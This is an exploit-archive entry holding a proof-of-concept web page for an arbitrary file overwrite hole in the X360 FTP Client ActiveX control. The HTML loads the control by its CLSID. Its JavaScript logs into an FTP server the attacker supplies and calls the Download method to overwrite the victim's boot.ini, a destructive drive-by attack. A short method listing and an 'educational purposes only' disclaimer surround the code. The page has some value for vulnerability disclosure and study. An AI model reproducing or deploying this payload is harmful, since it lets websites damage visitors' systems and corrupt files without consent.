X360 FTP Client (X360FtpClient.ocx) Remote File Download-Overwrite
2008-05-09 00:00:00<HTML>
<!--
- X360 FTP Cleint (X360FtpClient.ocx) Remote File Download/Overwrite -
Author: t0pP8uZz
Homepage: h4ck-y0u.org / milw0rm.com / Ciphercrew
Description: ActiveX Remote Insecure Methods, Arbitrary File Overwrite Vulnerability.
Report: Tested on Microsoft Windows XP Pro (SP2 ) Internet Explorer 6 Fully Patched
ActiveX: http://www.x360soft.com/ftp-activex-ocx/x360-ftp-activex-ocx.html
The Following Material Is For Educational Purposes Only - I will not be held responsable for any illegal actions.
InternetExplorer can Initialise this ActiveX control, And take advantage of its functions.
Included in this exploit (POC) is a peice of javascript code lauching the ActiveX control, and executing the "Download()" Method, this allows system files to be overwritten.
- X360FtpClient.ocx Information -
Interface _DX360FtpClient : IDispatch
Default Interface: True
Members : 35
XPassword
XPortNo
XServerName
XUserName
XLicenseKey
XTransferType
DeleteFolder
CreateFolder
GetFileName
GetFileType
GetFileSize
SetRemoteFolder
DeleteFile
Download
Upload
RenameFile
RenameFolder
FindFile
__EOF__
Peace, t0pP8uZz
-->
<OBJECT ID="x360" CLASSID="CLSID:65DAE962-97DC-49EF-8591-CB5CFDEE3554">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - X360 FTP Cleint (X360FtpClient.ocx) Remote File Download/Overwrite - */
/* Javascript Code By t0pP8uZz */
//Description: the below code will overwrite boot.ini on a windows machine. if the correct ftp details are given, and a blank boot.ini is hosted remotely.
x360.XServerName = "127.0.0.1"; // your ftp server
x360.XUserName = "username"; // server username
x360.XPassword = "password"; // server password
x360.XTransferType = 0;
remoteFile = "/public_html/boot.init"; // path to remote file to download and replace locally, file name MUST be the same on the FTP , has the file you wish to overwrite locally.
localFile = "C:/"; // directory which to place the downloaded file in, no filename, has the activex uses the remote filename.
if( (x360.Login() == 0) )
x360.Download(remoteFile, localFile);
// else fail
</script>
</HTML>
#
Fixes
No fixesIn order to submit a new fix you need to be registered.